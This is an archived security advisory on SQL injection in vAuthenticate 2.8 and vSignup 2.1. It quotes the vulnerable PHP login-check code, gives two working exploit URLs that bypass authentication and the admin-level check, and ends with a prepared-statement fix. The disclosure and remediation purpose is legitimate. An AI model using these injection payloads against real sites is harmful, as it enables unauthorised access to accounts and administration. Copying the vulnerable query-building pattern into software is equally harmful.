Information :
°°°°°°°°°°°°°

-----------------------
Product : vAuthenticate
Version : 2.8
-----------------------
Product : vSignup
Version : 2.1
-----------------------

Website : http://www.beanbug.net
Problem : SQL Injection

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

chgpwd.php :
-----------------------------------------------
<?
if (!class_exists(auth)) {
    include ("auth.php");
}
include ("authconfig.php");
include ("check.php");
?>
-----------------------------------------------

admin/index.php :
------------------------------------------
<?
if (!class_exists(auth)) {
    include ("../auth.php");
}
include ("../authconfig.php");
include ("../check.php");
if ($check["level"] != 1) {
------------------------------------------

check.php :
------------------------------------------------------------------------
<?
$CheckSecurity = new auth();
$check = $CheckSecurity->page_check($USERNAME, $PASSWORD);
if ($check == false) {
    // Feel free to change the error message below. Just make sure you put a "\" before
    // any double quote.
    print "<font face=\"Arial, Helvetica, sans-serif\" size=\"5\" color=\"#FF0000\">";
    print "<b>Illegal Access</b>";
    print "</font><br>";
    print "<font face=\"Verdana, Arial, Helvetica, sans-serif\" size=\"2\" color=\"#000000\">";
    print "<b>You do not have permission to view this page.</b></font>";
    exit; // End program execution. This will disable continuation of processing the rest of the page.
}
?>
------------------------------------------------------------------------

auth.php :
------------------------------------------------------------------------
function page_check($username, $password) {
    $query = "SELECT * FROM authuser WHERE uname='$username' AND passwd='$password' AND status <> 'inactive'";
    $connection = mysql_connect($this->HOST, $this->USERNAME, $this->PASSWORD);
    // OLD CODE - DO NOT REMOVE
    // $result = mysql_db_query($this->DBNAME, $query);
    // REVISED CODE
    $SelectedDB = mysql_select_db($this->DBNAME);
    $result = mysql_query($query);
    $numrows = mysql_num_rows($result);
    $row = mysql_fetch_array($result);
    // CHECK IF THERE ARE RESULTS
    // Logic: If the number of rows of the resulting recordset is 0, that means that no
    // match was found. Meaning, wrong username-password combination.
    if ($numrows == 0) {
        return false;
    } else {
        return $row;
    }
} // End: function page_check
------------------------------------------------------------------------

The problem: page_check() builds its SQL string by interpolating $username and $password with no escaping, and check.php passes it $USERNAME and $PASSWORD, which (under register_globals) come straight from the USERNAME and PASSWORD request parameters. A single quote in either value therefore rewrites the WHERE clause, and since the returned row is also used for the admin-level check in admin/index.php, the level test can be bypassed the same way.

Exploits :
°°°°°°°°°°

http://[target]/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='
http://[target]/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1

Patches :
°°°°°°°°°

A patch can be found on http://www.phpsecure.org.

More details :
°°°°°°°°°°°°°°

In French : http://www.frog-man.org/tutos/vAuth-Signup.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FvAuth-Signup.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
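A hardened rewrite of page_check(), added here as an illustration; it is not the vendor's code nor the phpsecure.org patch. It keeps the authuser table (uname, passwd, status) and the HOST/USERNAME/PASSWORD/DBNAME properties seen above, but sends the two inputs as bound parameters of a mysqli prepared statement, so a quote in USERNAME or PASSWORD can no longer alter the WHERE clause (or the level check built on its result).

```php
<?php
// Added example (not from vAuthenticate): page_check() with a prepared statement.
// Assumes the same auth class properties and authuser schema as the quoted code.
class auth {
    public $HOST, $USERNAME, $PASSWORD, $DBNAME;

    function page_check($username, $password) {
        $db = @new mysqli($this->HOST, $this->USERNAME, $this->PASSWORD, $this->DBNAME);
        if ($db->connect_error) {
            return false; // fail closed: no DB means no authentication
        }

        // Placeholders instead of string interpolation. The values travel
        // separately from the SQL text, so ' OR ''=' is compared as a plain
        // string against uname/passwd and never becomes part of the query.
        $sql = "SELECT * FROM authuser WHERE uname = ? AND passwd = ? AND status <> 'inactive'";
        $stmt = $db->prepare($sql);
        if ($stmt === false) {
            $db->close();
            return false;
        }
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        $result = $stmt->get_result(); // requires the mysqlnd driver
        $row = $result ? $result->fetch_assoc() : null;
        $stmt->close();
        $db->close();

        // Same contract as the original: false on no match, the row otherwise.
        // (Binding fixes the injection; how passwd is stored is a separate issue.)
        return $row ? $row : false;
    }
}
```

The caller in check.php and the `$check["level"] != 1` test in admin/index.php can stay unchanged, because the row they receive now only ever matches a real uname/passwd pair.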
This archive was generated by hypermail 2b30 : Mon Jan 20 2003 - 21:54:57 PST